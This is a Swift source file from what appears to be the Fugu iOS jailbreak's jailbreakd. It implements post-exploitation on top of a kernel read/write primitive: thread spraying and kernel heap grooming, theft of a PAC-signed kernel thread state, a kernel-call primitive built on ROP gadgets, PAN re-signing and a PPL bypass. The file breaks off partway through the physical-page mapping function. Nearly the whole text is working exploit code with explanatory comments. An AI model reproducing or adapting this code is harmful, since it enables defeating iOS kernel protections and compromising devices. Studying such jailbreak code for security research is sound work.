//
// PostExploitation.swift
// jailbreakd
//
// Created by Linus Henze.
// Copyright © 2021 Linus Henze. All rights reserved.
//
import Foundation
import KernelExploit
import externalCStuff
import IOKit_iOS
import JailbreakUtils
class Logger {
static var logFileHandle: FileHandle?
static func print(_ s: String) {
NSLog("%@", s)
if logFileHandle != nil {
try? logFileHandle.unsafelyUnwrapped.write(contentsOf: (s + "\n").data(using: .utf8) ?? Data())
}
}
static func fmt(_ s: String, _ args: CVarArg...) {
print(String(format: s, arguments: args))
}
}
enum PostExploitationError: Error {
case taskForPidFailed
case taskSuspendFailed
case threadCreateFailed
case failedToFindProcs
case failedToFindContiguousRegion(pid: pid_t, port: mach_port_t)
case failedToObtainSignedState
case failedToFindKernelThread
case failedToFindLaunchd
case untetherNotInstalled
case failedToGetState
case failedToSetState
case noKernelThread
case failedToFindReturnState
case badPA
case badVA
case failedToFindMyProc
case failedToFindMyProcPMap
case failedToInjectTrustCache
case kernelOutOfMemory
case failedToExtractBootstrap
case launchctlCheckFailed
case failedToGetPortTable
}
let gKCallLock = NSLock()
class PostExploitation {
let mem: MemoryAccess
let offsets: Offsets.KernelOffsetsEntry
public private(set) var thisProc: Proc!
public private(set) var launchdProc: Proc!
public private(set) var kernelProc: Proc!
private var pmap_image4_trust_caches: UnsafeMutablePointer<Int64>!
struct CallThread {
let pid: pid_t // Child pid
let port: thread_t // Mach port for the thread
var signedState: Data // The signed kernel state
let userSignedState: Data // Some signed user state
let statePtr: UInt64 // Where to write the signed state to
let stateMapped: UInt64 // Pointer to mapped state
let returnStateTh: thread_t // Mach port for the thread which is used for return
let returnState: UInt64 // Pointer to the state of returnStateTh
var stackPtr: UInt64 // Some stack [changed once after the kcall gadget is set up]
var x22Ptr: UInt64 // Userspace pointer to x22 on the stack [assuming there is an exception frame]
}
var callThread: CallThread?
init() throws {
// Run setup first
try MemoryAccess.setup()
mem = try MemoryAccess()
offsets = mem.offsets
thisProc = Proc(self, addr: mem.thisProc)
kernelProc = Proc(self, addr: mem.kernelProc)
launchdProc = Proc(self, addr: mem.launchdProc)
// Also init krw support
// TODO(zhuowei): hack
// _ = initKrwSupport()
}
func slide(_ ptr: UInt64) -> UInt64 {
return ptr + mem.kernelSlide
}
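// Scans a dump of kernel memory for the signed arm_context captured by the
// helper thread: it matches the saved-state header 0x4A00000015 (which appears
// to encode the thread state flavour and size), the 0x42424242...0x45454545
// marker values expected in the NEON registers, and a FAR equal to the
// expected fault address. Returns the byte offset of that state within the
// dump, or nil if nothing matches.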
func calculateThreadStateAdjust(fromData data: Data, andFaultAddr faultAddr: UInt64) -> UInt? {
print("calculateThreadStateAdjust")
let nItems = ((data.count - 0x188) >> 3)
for i in 0..<nItems {
let off = UInt(i * 8)
// Check signature (thread state type + size)
let sig = data.getGeneric(type: UInt64.self, offset: off)
if sig == 0x4A00000015 {
// Check neon registers
let s1 = data.getGeneric(type: UInt64.self, offset: off + 0x150)
let s2 = data.getGeneric(type: UInt64.self, offset: off + 0x160)
let s3 = data.getGeneric(type: UInt64.self, offset: off + 0x170)
let s4 = data.getGeneric(type: UInt64.self, offset: off + 0x180)
if s1 == 0x42424242, s2 == 0x43434343, s3 == 0x44444444, s4 == 0x45454545 {
// Looks good, check far
let far = data.getGeneric(type: UInt64.self, offset: off + 0x118)
if far == faultAddr {
// This seems to be it!
return off
}
}
}
}
print("no sig")
return nil
}
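// Creates a new Mach thread in `task` and returns both its thread port and
// the corresponding kernel `Thread` object, found by snapshotting the task's
// thread list beforehand and then walking it again for the entry that was
// not there before.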
func getThread(forTask task: task_t, proc: Proc) -> (thread_t, Thread)? {
// First, we have to find the addresses of the current threads
// so we can later find out which one is the new one
var oldThs: [UInt64] = []
var curTh = proc.task?.thread
while curTh != nil {
//print("curTh = \(curTh.unsafelyUnwrapped.addr)")
if curTh.unsafelyUnwrapped.addr < 0x10000000 {
break // TODO(zhuowei): WHAT???
}
oldThs.append(curTh.unsafelyUnwrapped.addr)
curTh = curTh.unsafelyUnwrapped.next
}
// Create the new thread
var thPort: thread_t = 0
guard thread_create(task, &thPort) == KERN_SUCCESS else {
Logger.print("[getThread] thread_create failed, this should not happen!")
return nil
}
// Find the newly created thread
curTh = proc.task?.thread
while curTh != nil && oldThs.contains(curTh.unsafelyUnwrapped.addr) {
if curTh.unsafelyUnwrapped.addr < 0x10000000 {
break // TODO(zhuowei): WHAT???
}
curTh = curTh.unsafelyUnwrapped.next
}
guard curTh != nil else {
Logger.print("[getThread] curTh == nil -- Offsets are wrong!")
return nil
}
return (thPort, curTh.unsafelyUnwrapped)
}
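// Allocates two pages, keeps the first readable/writable and makes the second
// inaccessible, then returns a pointer just below the guard page. The helper
// thread later faults at a predictable address inside the protected page,
// which is what calculateThreadStateAdjust matches against.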
func createExploitMem() -> UInt64 {
var addr: vm_address_t = 0
vm_allocate(mach_task_self_, &addr, 0x8000, VM_FLAGS_ANYWHERE)
vm_protect(mach_task_self_, addr, 0x4000, 1, VM_PROT_READ | VM_PROT_WRITE)
vm_protect(mach_task_self_, addr + 0x4000, 0x4000, 1, VM_PROT_NONE)
return UInt64(addr) + 0x3FF0
}
/*
* Setup kernel call primitive.
*/
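// Rough flow: fork and suspend a child, spray ~500 threads into it so their
// kernel thread contexts end up back to back (0x350 apart), then use a helper
// thread plus a direct write to its kernel stack pointer field to make the
// kernel dump a PAC-signed arm_context into that contiguous region. Once a
// signed state has been captured, one of the sprayed threads whose saved CPSR
// indicates EL1 (or EL2 on some devices) is repurposed as the kcall thread.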
private func _setupKernelCall() throws {
// Fork to get a new task
// We will abuse its threads
typealias fType = @convention(c) () -> pid_t
let fork = unsafeBitCast(dlsym(dlopen(nil, 0), "fork"), to: fType.self)
let child = fork()
if child == 0 {
while true {
sleep(100)
}
}
// Get task port for the task
var chPort: mach_port_t = 0
guard task_for_pid(mach_task_self_, child, &chPort) == 0 else {
Logger.print("task_for_pid failed!")
throw PostExploitationError.taskForPidFailed
}
var killChild = true
defer {
if killChild {
// Make sure to terminate child if we failed
task_terminate(chPort)
kill(child, SIGKILL)
waitpid(child, nil, 0)
}
}
// Task shouldn't be running
guard task_suspend(chPort) == 0 else {
Logger.print("Failed to suspend child!")
throw PostExploitationError.taskSuspendFailed
}
// Find child proc
var cur: Proc! = Proc.getFirstProc(pe: self)
var childProc: Proc?
while cur != nil {
if cur.pid == child {
childProc = cur
break
}
cur = cur.next
}
guard childProc != nil else {
// ???
throw PostExploitationError.failedToFindProcs
}
Logger.print("Creating threads...")
// Create many threads
var initState = arm_thread_state64_t()
initState.__pc = UInt64(UInt(bitPattern: dlsym(dlopen(nil, 0), "userReturn")))
var thList: [thread_t] = []
for _ in 0..<500 {
var thPort: thread_t = 0
var kr = thread_create(chPort, &thPort)
guard kr == 0 else {
Logger.print("Failed to create thread!")
throw PostExploitationError.threadCreateFailed
}
let cnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: initState) >> 2)
kr = withUnsafeMutablePointer(to: &initState) { ptr -> kern_return_t in
return thread_set_state(thPort, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), cnt)
}
guard kr == 0 else {
Logger.print("Failed to set thread state!")
throw PostExploitationError.threadCreateFailed
}
thList.append(thPort)
}
Logger.print("Threads created")
// Loop over threads
// Find addresses of their contexts
var kAddrs: [UInt64] = []
var curTh = childProc!.task!.thread
for _ in 0..<(thList.count-1) {
let a = try mem.r64(virt: curTh.unsafelyUnwrapped.addr + offsets.threadStruct.contextOffset)
kAddrs.append(a)
curTh = curTh.unsafelyUnwrapped.next
}
kAddrs.sort()
Logger.print("Finding contiguous region...")
// Find a contiguous region
// i.e. threads whose states are contiguous
var found = false
var regionStart: UInt64 = 0
var foundCnt = 0
for i in 0..<(kAddrs.count-1) {
if (kAddrs[i+1] - kAddrs[i]) != 0x350 {
regionStart = 0
foundCnt = 0
} else {
if regionStart == 0 {
regionStart = kAddrs[i]
foundCnt = 1
} else if (foundCnt + 1) == 18 {
found = true
break
} else {
foundCnt += 1
}
}
}
if !found {
Logger.print("Failed to find a contiguous region!")
killChild = false // Will be done later by the wrapper function
throw PostExploitationError.failedToFindContiguousRegion(pid: child, port: chPort)
}
// Calculate end
let regionEnd = regionStart + 0x3EF0
Logger.fmt("Contiguous region %p - %p", regionStart, regionEnd)
// Loop over all threads again to find out
// where the userspace regs are located
curTh = childProc!.task!.thread
var userStatePtrs: [(UInt64, Thread)] = []
for _ in 0..<500 {
let a = try mem.rPtr(virt: curTh.unsafelyUnwrapped.addr + offsets.threadStruct.contextOffset + 0x8)
if a > regionStart && a < regionEnd {
userStatePtrs.append((a, curTh.unsafelyUnwrapped))
}
curTh = curTh.unsafelyUnwrapped.next
}
// Sort and pick an entry near the end (third from last) so we have
// enough space on the kernel stack
userStatePtrs.sort(by: { $0.0 < $1.0 })
let targetThread = userStatePtrs[userStatePtrs.count - 3]
let targetState = targetThread.0
Logger.fmt("Will target state @ %p", targetState)
let userSignedState = try mem.readBytes(virt: targetThread.0, count: 0x350)
// Create a backup of the contiguous region
let backup = try mem.readBytes(virt: regionStart, count: 0x3BA0)
// Clear contiguous region
try mem.writeBytes(virt: regionStart, data: Data(repeating: 0, count: 0x3BA0))
// Create a new thread (used for finding the correct offset)
guard let signOffsetGetterTh = getThread(forTask: mach_task_self_, proc: thisProc.unsafelyUnwrapped) else {
throw PostExploitationError.threadCreateFailed
}
try mem.writeBytes(virt: regionStart, data: backup)
// Map its thread struct into our process
// Assumption: Thread structs will never cross a page boundary
//var threadStructPage = try mem.virt2phys(signOffsetGetterTh.1.addr & ~0x3FFF)
var threadStructOffset = signOffsetGetterTh.1.addr & 0x3FFF
//var threadStructMapped = try mem.unsafeMapAddress(phys: threadStructPage, size: 0x4000) + ///threadStructOffset
// zhuowei: all right, give me a control page.
let controlPage = UnsafeMutableRawBufferPointer.allocate(byteCount: 0x4000, alignment: 2)
// zhuowei: sync sync sync
// Set its state
var state = arm_thread_state64_t()
state.__pc = UInt64(UInt(bitPattern: dlsym(dlopen(nil, 0), "doMagic")))
state.__x.21 = UInt64(UInt(bitPattern: controlPage.baseAddress!)) // threadStructMapped
state.__x.22 = targetState
state.__x.23 = createExploitMem()
state.__x.24 = offsets.threadStruct.kStackPtrOffset
state.__sp = UInt64(UInt(bitPattern: valloc(0x4000))) + 0x4000 - 0x10
let cnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: state) >> 2)
var signedStateOffset: UInt!
var before: UInt64 = 0
var kData = Data()
for _ in 0..<50 {
let kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_set_state(signOffsetGetterTh.0, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), cnt)
}
guard kr == 0 else {
Logger.print("Failed to setup thread!")
throw PostExploitationError.threadCreateFailed
}
Logger.print("Resuming thread")
// we don't have structs mapped, so we need to do this ourselves.
// set this to 0x61 (thread not started yet)
controlPage[0] = 0x61
// Swift turns this into an infinite loop without this.
// I know this is wrong, but making threads synchronize properly is too hard
OSMemoryBarrier()
// Wait for the thread to do its magic
// XXX: Shitty detection logic
before = try mem.r64(virt: state.__x.22 - 0x8)
thread_resume(signOffsetGetterTh.0)
print("resumed thread")
while controlPage[0] != 0x62 {
// wait for the thread to start.
// when it starts, it pokes 0x62 to signal it's ready.
OSMemoryBarrier()
}
print("writing")
let kStackPtrPtrForThisThread = signOffsetGetterTh.1.addr + offsets.threadStruct.kStackPtrOffset
// set kernel stack to targetState
try mem.w64(virt: kStackPtrPtrForThisThread, data: state.__x.22)
controlPage[0] = 0x63
OSMemoryBarrier()
while try mem.r64(virt: state.__x.22 - 0x8) == before { }
// Sleep for a bit
usleep(10000)
Logger.print("Thread should be done now")
// restore the original ptr
// try mem.w64(virt: kStackPtrPtrForThisThread, data: originalStackPtr)
// Read kernel data
kData = try mem.readBytes(virt: targetState & ~0x3FFF, count: 0x4000)
// Try to find the offset
signedStateOffset = calculateThreadStateAdjust(fromData: kData, andFaultAddr: state.__x.23 + 0x10)
if signedStateOffset == nil {
// Maybe the thread isn't done yet?
// Sleep a bit more, then retry
for i in 0..<1 {
//Logger.print("Thread wasn't done? Trying again (try \(i+1) of 3)")
usleep(100000)
kData = try mem.readBytes(virt: targetState & ~0x3FFF, count: 0x4000)
signedStateOffset = calculateThreadStateAdjust(fromData: kData, andFaultAddr: state.__x.23 + 0x10)
if signedStateOffset != nil {
break
}
}
guard signedStateOffset != nil else {
Logger.print("Nope, trying again")
continue
}
}
break
}
guard signedStateOffset != nil else {
Logger.print("Exploit is broken...")
thread_terminate(signOffsetGetterTh.0)
throw PostExploitationError.failedToObtainSignedState
}
Logger.fmt("Offset for exploitation: %p", signedStateOffset)
// Create a new thread to obtain the signed state
guard let signTh = getThread(forTask: mach_task_self_, proc: thisProc.unsafelyUnwrapped) else {
throw PostExploitationError.threadCreateFailed
}
// Kill the thread, zero memory and retry with the correct offset
// Suspend and set offset
thread_terminate(signOffsetGetterTh.0)
print("ok, about to do the obtaining")
sleep(1)
// Zero contiguous region again
try mem.writeBytes(virt: regionStart, data: Data(repeating: 0, count: 0x3BA0))
// Map its thread struct
//threadStructPage = try mem.virt2phys(signTh.1.addr & ~0x3FFF)
threadStructOffset = signTh.1.addr & 0x3FFF
//threadStructMapped = try mem.unsafeMapAddress(phys: threadStructPage, size: 0x4000) + threadStructOffset
// Set state
let targetStateOff = UInt(targetState - regionStart)
state.__x.21 = UInt64(UInt(bitPattern: controlPage.baseAddress!)) // threadStructMapped
state.__x.22 = targetState + UInt64(targetStateOff - signedStateOffset)
guard state.__x.22 > regionStart && state.__x.22 < regionEnd else {
Logger.print("Offset to obtain signed state is bad: Outside the region")
throw PostExploitationError.failedToObtainSignedState
}
var canContinue = false
for _ in 0..<50 {
let kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_set_state(signTh.0, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), cnt)
}
guard kr == 0 else {
Logger.print("Failed to change thread!")
throw PostExploitationError.failedToObtainSignedState
}
//Logger.print("Attempting to obtain signed state")
// Retry
controlPage[0] = 0x61
OSMemoryBarrier()
// XXX: Shitty detection logic
before = try mem.r64(virt: state.__x.22 - 0x8)
thread_resume(signTh.0)
while controlPage[0] != 0x62 {
// wait for the thread to start.
// when it starts, it pokes 0x62 to signal it's ready.
OSMemoryBarrier()
}
let kStackPtrPtrForThisThread = signTh.1.addr + offsets.threadStruct.kStackPtrOffset
// set kernel stack to targetState
try mem.w64(virt: kStackPtrPtrForThisThread, data: state.__x.22)
controlPage[0] = 0x63
OSMemoryBarrier()
while try mem.r64(virt: state.__x.22 - 0x8) == before { }
// Sleep for a bit
usleep(10000)
//Logger.print("Thread should be done now")
// Read and check the state
// First check that the offsets match
kData = try mem.readBytes(virt: targetState & ~0x3FFF, count: 0x4000)
if calculateThreadStateAdjust(fromData: kData, andFaultAddr: state.__x.23 + 0x10) ?? 0 != targetStateOff {
// Maybe the thread isn't done yet?
// Sleep a bit more, then retry
var ok = false
for i in 0..<1 {
//Logger.print("Thread wasn't done? Trying again (try \(i+1) of 3)")
usleep(100000)
if calculateThreadStateAdjust(fromData: kData, andFaultAddr: state.__x.23 + 0x10) ?? 0 == targetStateOff {
ok = true
break
}
}
guard ok else {
//Logger.print("Nope, trying again")
continue
}
}
canContinue = true
break
}
thread_terminate(signTh.0)
guard canContinue else {
Logger.print("Exploit is broken...")
Logger.fmt("%p", calculateThreadStateAdjust(fromData: kData, andFaultAddr: state.__x.23 + 0x10) ?? 0x1337)
throw PostExploitationError.failedToObtainSignedState
}
// Now check cpsr
// Should be EL1, without the IL bit set
// iPhone 12 apparently uses EL2?
let cpsr = kData.getGeneric(type: UInt32.self, offset: targetStateOff + 0x110)
guard (cpsr & 0x100004) == 0x4 || (cpsr & 0x100008) == 0x8 else {
Logger.fmt("CPSR is wrong! Read: %d", cpsr)
throw PostExploitationError.failedToObtainSignedState
}
// Should be ok now
// Restore backup
try mem.writeBytes(virt: regionStart, data: backup)
// Write signed state
let signedState = kData[targetStateOff..<(targetStateOff+0x350)]
let statePtr = regionStart + UInt64(targetStateOff)
try mem.writeBytes(virt: statePtr, data: signedState)
Logger.print("Obtained signed kernel state!")
print("ok, we made it!")
sleep(1)
// Now find the thread which can be used to execute kernel code
for th in thList {
var state = arm_thread_state64_t()
var cnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: state) >> 2)
var kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_get_state(th, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), &cnt)
}
guard kr == 0 else {
continue
}
// iPhone 12 is using EL2?
if (state.__cpsr & 0x4) == 0x4 || (state.__cpsr & 0x8) == 0x8 {
// Got it!
Logger.print("Found magic thread!")
Logger.print("Attempting to set other registers...")
state.__x.0 = 0x414243440000
state.__x.1 = 0x414243440100
state.__x.2 = 0x414243440200
state.__x.3 = 0x414243440300
state.__x.4 = 0x414243440400
state.__x.5 = 0x414243440500
state.__x.6 = 0x414243440600
state.__x.7 = 0x414243440700
state.__x.8 = 0x414243440800
state.__x.9 = 0x414243440900
state.__x.10 = 0x414243440A00
state.__x.11 = 0x414243440B00
state.__x.12 = 0x414243440C00
state.__x.13 = 0x414243440D00
state.__x.14 = 0x414243440E00
state.__x.15 = 0x414243440F00
state.__x.16 = 0x414243441000
state.__x.17 = 0x414243441100
state.__x.18 = 0x414243441200
state.__x.19 = 0x414243441300
state.__x.20 = 0x414243441400
state.__x.21 = 0x414243441500
state.__x.22 = 0x414243441600
state.__x.23 = 0x414243441700
state.__x.24 = 0x414243441800
state.__x.25 = 0x414243441900
state.__x.26 = 0x414243441A00
state.__x.27 = 0x414243441B00
state.__x.28 = 0x414243441C00
state.__fp = 0x414243441D00
state.__lr = 0x414243441E00
state.__sp = 0x414243441F00
state.__pc = 0x414243442000
Logger.print("Writing state...")
kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_set_state(th, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), cnt)
}
Logger.fmt("thread_set_state returned %d", kr)
if kr == KERN_SUCCESS {
// Create a new thread
// We will use its user state
guard let userStateTh = getThread(forTask: chPort, proc: childProc.unsafelyUnwrapped) else {
Logger.print("Failed to create user state thread!")
throw PostExploitationError.threadCreateFailed
}
// Set its state to our loop function
state.__pc = UInt64(UInt(bitPattern: dlsym(dlopen(nil, 0), "userReturn")))
kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_set_state(userStateTh.0, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), cnt)
}
guard kr == KERN_SUCCESS else {
Logger.print("Failed to set state of user state thread!")
throw PostExploitationError.failedToSetState
}
// Map x22 (on the stack, exception frame)
var stackX22 = statePtr - 0x6A0 + 0xB8
var stackX22Page = stackX22 & ~0x3FFF
var stackX22Off = stackX22 & 0x3FFF
var x22Ptr = stackX22 // try mem.unsafeMapAddress(phys: mem.virt2phys(stackX22Page), size: 0x4000) + stackX22Off
// Map signed state
let sStatePage = statePtr & ~0x3FFF
let sStateOff = statePtr & 0x3FFF
let sStateMp = statePtr // try mem.unsafeMapAddress(phys: mem.virt2phys(sStatePage), size: 0x4000) + sStateOff
callThread = CallThread(pid: child, port: th, signedState: signedState, userSignedState: userSignedState, statePtr: statePtr, stateMapped: sStateMp, returnStateTh: userStateTh.0, returnState: try mem.rPtr(virt: userStateTh.1.addr + offsets.threadStruct.contextOffset + 0x8), stackPtr: statePtr - 0x350, x22Ptr: x22Ptr)
// Resume the other task so we can actually use kcall
task_resume(chPort)
killChild = false
// Now use the call gadget to get a real kernel stack
let stack = try kcall(function: slide(offsets.functions.kalloc), p1: 0x8000) + 0x7FF0
callThread!.stackPtr = stack
Logger.fmt("Allocated real kernel stack @ %p", stack)
// Change the x22 pointer
stackX22 = stack - 0x350 + 0xB8
stackX22Page = stackX22 & ~0x3FFF
stackX22Off = stackX22 & 0x3FFF
x22Ptr = stackX22 // try mem.unsafeMapAddress(phys: mem.virt2phys(stackX22Page), size: 0x4000) + stackX22Off
callThread!.x22Ptr = x22Ptr
// Kill any remaining threads
var threadList: thread_act_array_t?
var thCount: mach_msg_type_number_t = 0
if task_threads(chPort, &threadList, &thCount) == KERN_SUCCESS {
for i in 0..<Int(thCount) {
let other = threadList![i]
if other != th && other != userStateTh.0 {
thread_suspend(other)
thread_abort(other)
thread_terminate(other)
}
}
}
vm_deallocate(mach_task_self_, UInt(bitPattern: threadList), vm_size_t(MemoryLayout<thread_act_t>.size * Int(thCount)))
// Done!
return
}
}
}
throw PostExploitationError.failedToFindKernelThread
}
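// Re-signs the captured kernel state with the PAN bit (SPSR bit 22, 0x400000)
// set: the kernel runs ml_sign_thread_state over the modified values, and the
// new pc/cpsr/lr/x16/x17 plus the returned jophash are patched back into the
// cached signedState so later kcalls run with PAN enabled.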
func kernelCallEnablePAN() throws {
if !setupKernelCall() {
throw PostExploitationError.noKernelThread
}
guard let callThread = self.callThread else {
throw PostExploitationError.noKernelThread
}
// Restore signed state first
try mem.writeBytes(virt: callThread.statePtr, data: callThread.signedState)
// We just use the internal _kcall function which allows passing a callback
// The callback will be invoked after the call but before the thread returns
// Just copy the jophash while the thread hangs in the kernel
//let cpsrPointer = UnsafeMutablePointer<UInt64>(bitPattern: UInt(callThread.stateMapped) + 0x110)!
//let origCPSR = cpsrPointer.pointee
let cpsrKernelPointer = callThread.stateMapped + 0x110
let origCPSR = try mem.r64(virt: cpsrKernelPointer)
print(String(format: "orig CPSR: %lx", origCPSR))
var state = arm_thread_state64_t()
state.__x.0 = callThread.statePtr
state.__x.1 = 0 // pc
state.__x.2 = origCPSR | 0x400000 // cpsr, with PAN enabled
state.__x.3 = 0 // lr
state.__x.4 = 0 // x16
state.__x.5 = 0 // x17
var jopHash: UInt64 = 0
_ = try _kcall(function: slide(offsets.functions.ml_sign_thread_state), state: state, x1out: &jopHash)
// Okay, now we only have to apply our changes to the signedState data object
self.callThread!.signedState.withUnsafeMutableBytes { ptr in
let base = ptr.baseAddress!
// Write pc, cpsr, lr, x16, x17
base.advanced(by: 0x108).assumingMemoryBound(to: UInt64.self).pointee = 0 // pc
base.advanced(by: 0x110).assumingMemoryBound(to: UInt64.self).pointee = origCPSR | 0x400000
base.advanced(by: 0x0F8).assumingMemoryBound(to: UInt64.self).pointee = 0 // lr
base.advanced(by: 0x088).assumingMemoryBound(to: UInt64.self).pointee = 0 // x16
base.advanced(by: 0x090).assumingMemoryBound(to: UInt64.self).pointee = 0 // x17
base.advanced(by: 0x128).assumingMemoryBound(to: UInt64.self).pointee = jopHash
}
}
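// Idempotent wrapper around _setupKernelCall. failedToFindContiguousRegion is
// retried, and the failed children are only cleaned up afterwards (presumably
// so their kernel allocations stay put while retrying). On success, PAN is
// enabled in the signed state and a signed LR is captured for paciaBadly.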
func setupKernelCall() -> Bool {
if callThread != nil {
return true
}
// Try up to maxCount times (currently 1)
var failed: [(pid_t, mach_port_t)] = []
var ctr = 0
var res = false
let maxCount = 1
while ctr < maxCount {
do {
try _setupKernelCall()
res = true
break
} catch PostExploitationError.failedToFindContiguousRegion(pid: let pid, port: let port) {
// Ignore this error
// It might happen a few times before succeeding
failed.append((pid, port))
continue
} catch let e {
Logger.print("Error: _setupKernelCall: \(e)")
ctr += 1
}
}
// Terminate all the failed children
for f in failed {
task_resume(f.1)
task_terminate(f.1)
kill(f.0, SIGKILL)
waitpid(f.0, nil, 0)
}
if res {
// Enable PAN to prevent panicking when something enables interrupts
do {
try kernelCallEnablePAN()
} catch let e {
Logger.print("Error: kernelCallEnablePAN: \(e)")
res = false
}
// zhuowei: pacia
do {
try setupPaciaBadly()
} catch let e {
Logger.print("Error: setupPaciaBadly: \(e)")
}
}
return res
}
func deinitKernelCall() {
if let ct = callThread {
callThread = nil
task_terminate(ct.port)
kill(ct.pid, SIGKILL)
waitpid(ct.pid, nil, 0)
}
}
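// Core kernel call primitive. The cached signed state is restored, pc is set
// to the target function, sp to the kernel stack and lr/x22 to the "br x22"
// gadget so the call returns into a controlled loop. After resuming the
// thread, we poll the exception frame until the saved pc equals the gadget
// (i.e. the function has returned), then repeatedly write exception_return
// into the saved x22 and wait for 0x12345678 to appear in x23, which marks
// the thread's arrival back in userReturn. x0 (and optionally x1) are then
// read out of the frame.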
func _kcall(function: UInt64, state: arm_thread_state64_t, x1out: UnsafeMutablePointer<UInt64>? = nil, dontTouchMyGarbage: Bool = false) throws -> UInt64 {
gKCallLock.lock()
defer { gKCallLock.unlock() }
print("doing a _kcall!")
guard let callThread = self.callThread else {
throw PostExploitationError.noKernelThread
}
// Restore state first
try mem.writeBytes(virt: callThread.statePtr, data: callThread.signedState)
// Also clear x22, pc on the stack
try mem.w64(virt: callThread.stackPtr - 0x350 + 0xB8, data: 0)
try mem.w64(virt: callThread.stackPtr - 0x350 + 0x108, data: 0)
// Now build new state
var state = state
let brX22Gadget = slide(offsets.functions.brX22)
if !dontTouchMyGarbage {
// Setup the state so that the thread will loop
state.__lr = brX22Gadget
state.__pc = function
state.__sp = callThread.stackPtr
state.__x.21 = callThread.returnState
state.__x.22 = brX22Gadget
}
let cnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: state) >> 2)
let kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_set_state(callThread.port, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), cnt)
}
guard kr == 0 else {
throw PostExploitationError.failedToSetState
}
let x0Ptr = callThread.x22Ptr - 0xB0
let x1Ptr = callThread.x22Ptr - 0xA8
let x22Ptr = callThread.x22Ptr
let pcPtr = callThread.x22Ptr + 0x50
let x23UsrPtr = callThread.stateMapped + 0xC0
usleep(1000)
thread_resume(callThread.port)
// Wait for the pointer to appear
while true {
let theVal = try mem.r64(virt: pcPtr)
if theVal != brX22Gadget {
print(String(format: "waiting: %lx %lx", theVal, brX22Gadget))
usleep(1000)
} else {
break
}
}
// Wait for the thread to return
let exc_return = slide(offsets.functions.exception_return)
while true {
try mem.w64(virt: x22Ptr, data: exc_return)
if try mem.r64(virt: x23UsrPtr) == 0x12345678 {
break
}
usleep(1000)
}
thread_suspend(callThread.port)
if let x1out = x1out {
x1out.pointee = try mem.r64(virt: x1Ptr)
}
// Get x0
return try mem.r64(virt: x0Ptr)
}
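// Convenience wrapper: p1...p8 are passed in x0...x7. Typical use elsewhere
// in this file, e.g.
//     let buf = try kcall(function: slide(offsets.functions.kalloc), p1: 0x8000)
// to allocate kernel memory.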
func kcall(function: UInt64, p1: UInt64 = 0, p2: UInt64 = 0, p3: UInt64 = 0, p4: UInt64 = 0, p5: UInt64 = 0, p6: UInt64 = 0, p7: UInt64 = 0, p8: UInt64 = 0) throws -> UInt64 {
if !setupKernelCall() {
throw PostExploitationError.noKernelThread
}
var state = arm_thread_state64_t()
state.__x.0 = p1
state.__x.1 = p2
state.__x.2 = p3
state.__x.3 = p4
state.__x.4 = p5
state.__x.5 = p6
state.__x.6 = p7
state.__x.7 = p8
return try _kcall(function: function, state: state)
}
/*
* kcall without return value.
*/
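// Unlike _kcall, this does not route the return through the br x22 gadget:
// lr is set directly to exception_return and completion is detected by
// polling the thread's user state until x23 reads 0x12345678.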
func kcall_oneshot(function: UInt64, p1: UInt64 = 0, p2: UInt64 = 0, p3: UInt64 = 0, p4: UInt64 = 0, p5: UInt64 = 0, p6: UInt64 = 0, p7: UInt64 = 0, p8: UInt64 = 0) throws -> Void {
gKCallLock.lock()
defer { gKCallLock.unlock() }
guard let callThread = self.callThread else {
throw PostExploitationError.noKernelThread
}
// Restore state first
try mem.writeBytes(virt: callThread.statePtr, data: callThread.signedState)
// Now build new state
var state = arm_thread_state64_t()
var cnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: state) >> 2)
var kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_get_state(callThread.port, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), &cnt)
}
guard kr == 0 else {
throw PostExploitationError.failedToGetState
}
// Setup the state
state.__lr = slide(offsets.functions.exception_return)
state.__pc = function
state.__sp = callThread.stackPtr
state.__x.0 = p1
state.__x.1 = p2
state.__x.2 = p3
state.__x.3 = p4
state.__x.4 = p5
state.__x.5 = p6
state.__x.6 = p7
state.__x.7 = p8
state.__x.21 = callThread.returnState
cnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: state) >> 2)
kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_set_state(callThread.port, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), cnt)
}
guard kr == 0 else {
throw PostExploitationError.failedToSetState
}
usleep(1000)
thread_resume(callThread.port)
// Wait for the thread
while true {
cnt = mach_msg_type_number_t(MemoryLayout.size(ofValue: state) >> 2)
kr = withUnsafeMutablePointer(to: &state) { ptr -> kern_return_t in
return thread_get_state(callThread.port, ARM_THREAD_STATE64, thread_state_t(bitPattern: UInt(bitPattern: ptr)), &cnt)
}
guard kr == 0 else {
continue
}
if state.__x.23 == 0x12345678 {
break
}
}
thread_suspend(callThread.port)
}
/**
* PPL bypass: Map any phys page ;)
*/
func pmapMapPA(pmap: UInt64, pa: UInt64, va: UInt64) throws -> UInt64 {
// PPL bypass: If pa contains extra [high] bits, they will be ignored
// Additionally, all checks are bypassed
// Set bit 63
let pa = pa | (1 << 63)
// Safety check: pa and va *must* be page-aligned
guard (pa & 0x3FFF) == 0 else {
throw PostExploitationError.badPA
}
guard (va & 0x3FFF) == 0 else {
throw PostExploitationError.badVA
}
// Now call pmap_enter_options_addr
